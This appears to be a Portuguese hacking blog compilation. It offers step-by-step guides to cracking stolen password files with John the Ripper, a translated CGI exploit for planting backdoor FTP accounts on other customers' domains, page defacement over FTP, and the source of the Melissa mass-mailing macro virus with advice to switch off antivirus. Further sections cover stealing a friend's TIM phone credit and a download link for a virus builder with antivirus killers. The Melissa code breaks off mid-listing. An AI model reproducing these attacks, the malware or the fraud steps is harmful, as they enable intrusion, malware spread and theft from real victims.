Voce pode vir à pegar um arquivo passwd que não tenha contas de usuários, apenas defauts com a senha encriptada com um * no lugar. Em certos servidores com isso, vc pode ter passwd shadowed, mas em que todas as passwd files que já vi, havia um usurname como FTP e/ou NEWS que não tinham as senhas encriptadas, com um * no lugar.
Se vc achar apenas isso e NADA de senhas encriptadas, tente outra maneira de hackear o server.
Vc precisa examinar o arquivo de password'z e achar algo tipo assim:
rrc:uXDg04UkZgWOQ:201:4:Richard Clark:/export/home/rrc:/bin/ksh
Não precisa ser EXATAMENTE assim. a unica parte REALMENTE importante é o rrc:uXDg04UkZgWOQ, que é o username(rcc) e o passwd ENCRIPTADO(uXDg04UkZgWOQ)
Pegue um programa chamado JOHN THE RIPPER, que pode ser encontrado em qualquer Site de H/P/V/A/C na Web.
Para usar o JOHN THE RIPPER é facil. Se vc quer quebrar rapidamente as senhas, vá no prompt do DOS, no diretório do programa e digite:
john passwd -single
Onde passwd é o nome da passwd file. Por exemplo, se vc salvou a passwd file como pass.txt, ficaria:
john pass.txt -single
Uma coisa importante é que a passwd file esteja no mesmo diretório que o programa.
Para obter uma lista de outros métodos de quebrar uma passwd file, digite apenas "john", no diretório do programa, para obter uma lista de comandos.
Eu acho que o JOHN THE RIPPER funciona bem sem wordlists, mas algumas pessoas discordam. Se quiser se aprofundar no programa, procure um texto que enine a usar o JOHN THE RIPPER. Este aqui ensina apenas o básico.
Para concluir... se vc pegou a password e username, DIVIRTA-SE!!!

4>HACKEANDO UMA PAGE EM UM SERVER QUE VC TB TENHA ACESSO:
Essa seção ensina como hackear uma webpage num server onde vc já tem uma conta. Esse texto foi retirado de um texto feito por Lord Somer, e já que não quero arrancar algo importante do texto, vou apenas deixa-lo aí, apenas vou traduzi-lo, pois é um método complexo, onde qualquer cagada pode zoar o esquema todo.
Exploiting Net Adminstration CGI (by Lord Somer)
#######################################
Exploiting Net Administration Cgi's
like nethosting.com
Written by:Lord Somer
Date:9/2/97
#######################################
Bom, desde que a Nethosting.com fechou ou o que quer que seja, eu pensei:"Que porra eu vou fazer antes de esquecer como eu fiz esses hackz?" O que eu vou fazer é dizer COMO eu fiz, então daí vc pode vir a encontrar o mesmo sistema em algum outro lugar ou usar para tirar suas próprias idéias para o hack.
Basicamente, a nethosting.com fez toda a sua administração via CGI'z (net-admin.nethosting.com) Primeiro, vc precisa ter uma conta nesse server, falsifique unz numeros de cartão de crédito se necessário. Depois, entre dentro da área de administração... vc vai ver umas merdas como administração de FTP, e-mail, etc.
Quem se importa com e-mails? Então, vamos ao FTP. Clique na FTP ADMINISTRATION. Vamos dizer que vc está logado como 7hsphere.com. Seu url seria algo do tipo:
http://net-admin.nethosting.com/cgi-bin/add_ftp.cgi?7thspher
e.com+ljad32432jl
Apenas mude o 7hsphere.com para qualquer domínio que o sistema tenha, ou se no chmod, apenas delete essa parte, mas deixe o sinal de +, para editar o diretório usr/home. Na administração do FTP. faça uma conta de backdoor para esse domínio criando um diretório chamado /, já que multiplas /// continuam mostrando apenas /.
Uma vez que vc tem o backdoor, DIVIRTA-SE!
Bom, a teoria básica desse tipo de exploit é que:
-O CGI passava um parâmetro onde nós mudamos para algo do nosso interesse, para editarmos infoz.
-Desde que isso usa o bagulho depois do + para verificar se este é uma conta valida logada, isso não checa a password novamente.
- Multiplas ///'z no UNIX apenas significam uma /, então, não podemos ganhar acesso à diretórios de outras pessoas ou todo o diretório /usr/home.
Eu usei este método para hackear alguns lugares conhecidos:
-7thsphere.com
-sinnerz.com
-hawkee.com
-warez950.org
-lgn.com
E muitos outros sites desconhecidos.

5>OUTRA MANEIRA DE SE HACKEAR USER PAGES
Outro método que pode funcionar com servidores mal administrados é, às vezes, quando vc abre um FTP no server, vc sai do seu diretório home, volta algunz diretórioz, e acha o diretório da vitima. Uma vez que vc tenha feito isso, vc pode acessar os arquivos HTML, salvá-los no disco, editá-los e colocar novamente dentro do dir. Os arquivos HTML podem ou não ficar dentro do FTP, mas com adminz, eles não são acessíveis para outros usuários.


6>MÉTODOS QUE NÃO SE ENCAIXAM NAS OUTRAS CATEGORIAS.

Há muitas outras maneiras de se Hackear Web Pages. A burrice das pessoas é uma boa maneira. Muitas password'z são adivinháveis se elas não são hackeáveis. Isso não é hacking, mas sim estupidez de outras pessoas. Se vc pegar o root de um server, vc pode ter acesso a TUDO no servidor. Então, se vc quer hackear um servidor de webpage, ou acessar qualquer coisa nesse servidor, vc deve pegar uma conta e rodar um exploit no servidor, mas isso é uma coisa que newbies não devem tentar enquanto não tiverem certeza do que estão fazendo.

Criando o vírus Melissa


Criando o vírus Melissa
PS:
Esse virus faz com que o PC da vitima fique completamente louco
Não faça o teste no seu PC,

1º Abra o Bloco de Notas e Cole o Código a baixo
2º Salva com o nome Melissa.vbs


Um conselho naum vá achando que o .VBS é igual ao .BAT não então nem teste se não quiser ver a desgraça no seu PC
Olha é aconselhavél que você desative seu antivirus se não ele não vai deixar você fazer ele. É old mais é legal.

Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else Wink"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""

Roubando saldo do tim de seu amigo

A tim DISPONIBILIZO para seus usuarios UM SERVIÇO CHAMADO " Crédito Expresso " .
Detalhe: A Vitima tem que ter Um saldo minino de créditos para FAZER o serviço.
1 passo : Pegue o celular da VITIMA

2 passo : ligue para esse numero *144#

3 passo : Vai aparecer isso
CREDITO EXPRESSO
Digite o DDD e o numero do telefone para qual deseja tranferir creditos

4 passo : Feito isso na OUTRA tela
aparecera assim ... >>
CREDITO EXPRESSO
Escolha o valor a ser enviado
1 r$ 10.00
2 r$ 15.00

Ai é SÒ Você Escolher o valor e click em OK!!!

depois de 10 minutos
chegara o CREDITO no seu Celular

Evitando que programas espirem

Evitando que programas espirem


1º Vá no prompt de comando
2º digite ” Edit autoexec.bat”
3º Dentro do arquivo digite “date e a data atual separada pro barra /” ex: date 15/02/2007.
4º Aperte alt e com a seta do teclado va em salvar e depois em sair
5º Saia do prompt e reinicie o pc
Obs : programas com 30 dias d expiração nao vao expirar. e virus programados para atacar com data marcada não atacam.

Batch's Fire 4.0 (Melhor criador de virus)

Formato: rar/exe
Hospedagem: Easy-Share
Tamanho: 536 KB
Sistema: Windows XP e Windows Vista (No vista pode ocorrer algums erros)

Informação:

Esse programa foi criado por mim no intuito de você madar BadComs para suas vitimas, todos os tipos de virus, Badcoms e server está feito em Batch e Assembly, esse e o melhor programa para criar Badcoms e virus esse programa é 1.000 vezes melhor que a suposta "Fabrica de Vírus" que o ator atual é o Yuri o resto foi plagiada mais agora esse foi totalmeste feito por mim com um otimo grafico !
ATENÇÃO !!!
Antes de usar esse programa você vai precisar extrair tudo que está no diretório "Batch's Fire 4.0", e também para utilizar ele você vai precisar desativar o anti-virus porque nesse programa tem Avkillers.

Easy-Share:
http://www.easy-share.com/1904268656/Programa%20Batch%20-%20Invasoeshacker.blogspot.com.rar